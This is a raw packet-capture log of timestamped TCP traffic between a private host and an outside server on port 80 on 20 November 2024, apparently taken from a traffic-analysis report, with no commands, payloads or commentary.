                                                                                                            Nov 20, 2024 16:57:27.778208017 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.780229092 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.780304909 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.781496048 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.781577110 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.782946110 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.783011913 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.783423901 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.783479929 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.784565926 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.784641027 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.784744024 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.784802914 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.786434889 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.786480904 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.786756992 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.786804914 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.788161993 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.788202047 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.788218975 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.788249969 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.789868116 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.789932013 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.790191889 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.790241003 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.791548014 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.791620016 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.792488098 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.792555094 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.793462038 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.793499947 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.793519020 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.793536901 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.795160055 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.795224905 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.795340061 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.795391083 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.796659946 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.796708107 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.796811104 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.796849012 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.798279047 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.798333883 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.799352884 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.799407005 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.799446106 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.799480915 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.799493074 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.799521923 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.799525023 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.799561977 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.799571037 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.799604893 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.799720049 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.799763918 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.800009966 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.800055027 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.806193113 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.806272984 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.806489944 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.806535959 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.806852102 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.806886911 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.806900024 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.806929111 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.808645010 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.808681011 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.808717966 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.809608936 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.809644938 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.809669018 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.811849117 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.811918020 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.812299967 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.812354088 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.812742949 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.812791109 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.813656092 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.813707113 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.814608097 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.814671040 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.815335989 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.815385103 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.815768003 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.815815926 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.817047119 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.817101955 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.817219019 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.817318916 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.818731070 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.818783998 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.819379091 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.819428921 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.819843054 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.819891930 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.819977999 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.820023060 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.820887089 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.820921898 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.820943117 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.820960045 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.821964979 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.822017908 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.822741032 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.822793961 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.822894096 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.822932005 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.822946072 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.822974920 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.824803114 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.824872017 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.824951887 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.824995995 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.826565027 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.826628923 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.827028036 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.827102900 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.828140020 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.828198910 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.828773975 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.828839064 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.829885006 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.829955101 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.830174923 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.830233097 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.831585884 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.831657887 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.831726074 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.831779003 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.833327055 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.833398104 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.833777905 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.833836079 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.835057974 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.835119963 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.835180044 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.835237980 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.836683989 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.836744070 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.838354111 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.943783045 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.943841934 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.943958044 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.943958998 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.944159985 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.944304943 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.944772959 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.944838047 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.945900917 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.945974112 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.946203947 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.946268082 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.947020054 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.947033882 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.947133064 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.947657108 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.947717905 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.949044943 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.949058056 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.949069977 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.949096918 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.949129105 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.950268984 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.950280905 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.950325012 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.950325012 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.952003002 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.952017069 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.952066898 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.953211069 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.953226089 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.953269005 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.954144955 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.954195976 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.954581022 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.954633951 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.955394983 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.955446005 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.956911087 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.956923962 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.956937075 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.956984043 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.956984043 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.958458900 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.958515882 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.959212065 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.959259987 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.959307909 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.959357023 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.959496975 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.959538937 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.960763931 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.960808992 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.961218119 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.961257935 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.961339951 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.961352110 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.961380005 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.961406946 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.962477922 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.962491989 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.962527990 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.963085890 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.963098049 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.963109016 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.963120937 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.963135004 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.963176966 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.963176966 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.963588953 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.963633060 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.963742018 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.963783979 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.965702057 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.965749025 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:30.275741100 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:35.518501997 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:35.638484955 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:35.642501116 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:35.642501116 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:35.765492916 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:36.883152962 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:36.883167982 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:36.883188963 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:36.883199930 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:36.883213997 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:36.883220911 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:36.883233070 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:36.883243084 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:36.883246899 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:36.883250952 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:36.883260012 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:36.883265018 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:36.883275032 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:36.883276939 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:36.883292913 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:36.883306980 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:36.884166002 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:36.884206057 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.004192114 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.004209995 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.004257917 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.007613897 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.007750034 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.007787943 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.007787943 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.016068935 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.016508102 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.105851889 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.106204987 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.109006882 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.109174967 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.109625101 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.109659910 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.109791040 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.109921932 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.114381075 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.114429951 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.114448071 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.114545107 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.122898102 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.123275995 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.123326063 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.123326063 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.134284973 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.134674072 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.134721994 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.134721994 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.142606974 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.142996073 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.143039942 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.143039942 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.151093960 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.151453018 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.151613951 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.151788950 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.158328056 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.158487082 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.158898115 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.158981085 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.165581942 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.165684938 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.165719986 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.165719986 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.172907114 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.172976017 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.173201084 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.173263073 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.179951906 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.179975033 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.180131912 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.187426090 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.187479019 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.187707901 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.187752008 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.312028885 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.312453032 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.312505960 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.312505960 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.314694881 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.314738989 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.314795971 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.315078974 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.319900036 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.319966078 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.320008039 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.320219040 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.325046062 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.325354099 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.325453043 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.325871944 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.330269098 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.330321074 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.330482960 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.330933094 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.340572119 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.340617895 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.340831995 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.341061115 CET4916780192.168.2.22192.3.220.29
